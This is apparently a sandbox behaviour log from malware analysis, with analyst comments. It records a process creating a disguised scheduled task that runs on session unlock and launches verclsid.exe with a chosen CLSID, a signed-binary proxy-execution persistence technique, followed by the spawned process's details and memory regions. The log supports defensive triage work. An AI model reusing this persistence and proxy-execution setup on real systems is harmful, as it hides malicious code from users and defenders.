[0379.350] ITaskFolder:RegisterTask (in: This=0x38df70, Path="\\Update_AgentConfig_kEecfMwgj", XmlText=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", flags=6, UserId=0xcca70*(varType=0x8, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x1c), password=0xcca90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d0230, varVal2=0x1d0230), LogonType=0, sddl=0xcca50*(varType=0x0, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x2aa5a0), ppTask=0xcc9d8 | out: ppTask=0xcc9d8*=0x1d7e50) returned 0x0
[0379.622] GetProcessHeap () returned 0x280000
[0379.622] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x20) returned 0x2b3c10
[0379.623] _memicmp (_Buf1=0x29bcf0, _Buf2=0xff261b08, _Size=0x7) returned 0
[0379.623] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x29d500, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0379.623] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0379.623] GetProcessHeap () returned 0x280000
[0379.623] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x82) returned 0x2b7600
[0379.623] _vsnwprintf (in: _Buffer=0xcccb0, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xcc998 | out: _Buffer="SUCCESS: The scheduled task \"\\Update_AgentConfig_kEecfMwgj\" has successfully been created.\n") returned 91
[0379.623] _fileno (_File=0x7feff862ab0) returned 1
[0379.623] _errno () returned 0x1d4bb0
[0379.623] _get_osfhandle (_FileHandle=1) returned 0x7
[0379.623] _errno () returned 0x1d4bb0
[0379.623] GetFileType (hFile=0x7) returned 0x2
[0379.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0379.624] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xcc910 | out: lpMode=0xcc910) returned 1
[0379.625] __iob_func () returned 0x7feff862a80
[0379.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0379.625] lstrlenW (lpString="SUCCESS: The scheduled task \"\\Update_AgentConfig_kEecfMwgj\" has successfully been created.\n") returned 91
[0379.625] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xcccb0*, nNumberOfCharsToWrite=0x5b, lpNumberOfCharsWritten=0xcc980, lpReserved=0x0 | out: lpBuffer=0xcccb0*, lpNumberOfCharsWritten=0xcc980*=0x5b) returned 1
[0379.626] IUnknown:Release (This=0x1d7e50) returned 0x0
[0379.626] TaskScheduler:IUnknown:Release (This=0x38df70) returned 0x0
[0379.626] TaskScheduler:IUnknown:Release (This=0x1d7c40) returned 0x1
[0379.626] lstrlenW (lpString="") returned 0
# Analyst note: a.xml in the user's Temp directory is the only file path this process references
# in this excerpt. It is presumably the task definition that the XmlText passed to
# ITaskFolder:RegisterTask was read from; the read itself is not shown here. TODO confirm.
# If the file is still on disk, collect it as an artefact: it should hold the task XML with its
# element names intact, which this log lacks.
[0379.626] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml") returned 42
[0379.626] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0379.626] GetProcessHeap () returned 0x280000
[0379.626] GetProcessHeap () returned 0x280000
[0379.626] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c620) returned 1
[0379.626] GetProcessHeap () returned 0x280000
[0379.626] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c620) returned 0x1fc
[0379.627] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c620 | out: hHeap=0x280000) returned 1
[0379.627] GetProcessHeap () returned 0x280000
[0379.627] GetProcessHeap () returned 0x280000
[0379.627] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c5c0) returned 1
[0379.627] GetProcessHeap () returned 0x280000
[0379.627] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c5c0) returned 0x56
[0379.628] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c5c0 | out: hHeap=0x280000) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29d760) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29d760) returned 0x16
[0379.628] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d760 | out: hHeap=0x280000) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29d740) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29d740) returned 0x18
[0379.628] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d740 | out: hHeap=0x280000) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cf10) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cf10) returned 0x20
[0379.629] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cf10 | out: hHeap=0x280000) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c250) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c250) returned 0xa0
[0379.630] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c250 | out: hHeap=0x280000) returned 1
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcd0) returned 1
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bcd0) returned 0x18
[0379.630] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcd0 | out: hHeap=0x280000) returned 1
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd90) returned 1
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cd90) returned 0x20
[0379.631] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd90 | out: hHeap=0x280000) returned 1
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c550) returned 1
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c550) returned 0x5a
[0379.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c550 | out: hHeap=0x280000) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c530) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c530) returned 0x18
[0379.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c530 | out: hHeap=0x280000) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd30) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cd30) returned 0x20
[0379.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd30 | out: hHeap=0x280000) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c510) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c510) returned 0xc
[0379.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c510 | out: hHeap=0x280000) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c4f0) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c4f0) returned 0x18
[0379.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c4f0 | out: hHeap=0x280000) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295f90) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295f90) returned 0x20
[0379.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295f90 | out: hHeap=0x280000) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29be50) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29be50) returned 0x208
[0379.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29be50 | out: hHeap=0x280000) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcb0) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bcb0) returned 0x18
[0379.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcb0 | out: hHeap=0x280000) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295ea0) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295ea0) returned 0x20
[0379.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295ea0 | out: hHeap=0x280000) returned 1
[0379.636] GetProcessHeap () returned 0x280000
[0379.636] GetProcessHeap () returned 0x280000
[0379.636] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29d500) returned 1
[0379.636] GetProcessHeap () returned 0x280000
[0379.636] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29d500) returned 0x200
[0379.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d500 | out: hHeap=0x280000) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcf0) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bcf0) returned 0x18
[0379.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcf0 | out: hHeap=0x280000) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295e10) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295e10) returned 0x20
[0379.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295e10 | out: hHeap=0x280000) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c460) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c460) returned 0x14
[0379.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c460 | out: hHeap=0x280000) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c440) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c440) returned 0x18
[0379.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c440 | out: hHeap=0x280000) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295d50) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295d50) returned 0x20
[0379.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295d50 | out: hHeap=0x280000) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c480) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c480) returned 0x16
[0379.640] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c480 | out: hHeap=0x280000) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c300) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c300) returned 0x18
[0379.640] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c300 | out: hHeap=0x280000) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295d20) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295d20) returned 0x20
[0379.641] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295d20 | out: hHeap=0x280000) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc30) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc30) returned 0x2
[0379.641] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc30 | out: hHeap=0x280000) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295b70) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295b70) returned 0x20
[0379.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295b70 | out: hHeap=0x280000) returned 1
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295ba0) returned 1
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295ba0) returned 0x20
[0379.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295ba0 | out: hHeap=0x280000) returned 1
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295bd0) returned 1
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295bd0) returned 0x20
[0379.643] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295bd0 | out: hHeap=0x280000) returned 1
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c00) returned 1
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c00) returned 0x20
[0379.643] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295c00 | out: hHeap=0x280000) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cdc0) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cdc0) returned 0x20
[0379.644] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cdc0 | out: hHeap=0x280000) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cdf0) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cdf0) returned 0x20
[0379.644] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x297f20) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x297f20) returned 0x30
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29ce20) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29ce20) returned 0x20
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x297f60) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x297f60) returned 0x30
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cee0) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cee0) returned 0x20
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2b7600) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2b7600) returned 0x82
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2b3c10) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2b3c10) returned 0x20
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc50) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc50) returned 0x18
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c30) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c30) returned 0x20
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c60) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c60) returned 0x20
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c90) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c90) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cc0) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cc0) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc70) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc70) returned 0x18
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cf0) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cf0) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295d80) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295d80) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295de0) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295de0) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295e40) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295e40) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295e70) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295e70) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd60) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cd60) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc90) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc90) returned 0x18
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295db0) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295db0) returned 0x20
[0379.649] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc10) returned 1
[0379.649] GetProcessHeap () returned 0x280000
[0379.649] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc10) returned 0x18
[0379.649] exit (_Code=0)
Thread:
id = 102
os_tid = 0x3f4
# Analyst note: this verclsid.exe instance carries the same "/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
# arguments as the action in the XmlText of the ITaskFolder:RegisterTask call at [0379.350].
# verclsid.exe is a signed Windows binary; using it to instantiate a chosen CLSID is tracked as
# MITRE ATT&CK T1218.012. For triage, resolve that CLSID's COM server registration on the host
# to identify the module that gets loaded. The registration is not visible in this excerpt.
Process:
id = "14"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x7294a000"
os_pid = "0xd08"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
# parent_id "3" refers to a process whose header is outside this excerpt, so whether this launch
# came from the scheduled task or directly from the monitored process chain needs confirming.
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
# NOTE(review): bitness reads "32", yet the regions listed for this process include addresses
# above 4 GiB (e.g. 0x7feffba0000). Do not rely on this field alone to decide the architecture.
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2046
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2047
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2048
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2049
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2050
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2051
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2052
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2053
start_va = 0xffde0000
end_va = 0xffde6fff
monitored = 0
entry_point = 0xffde1b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 2054
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2055
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2056
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2057
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2058
start_va = 0x250000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2059
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
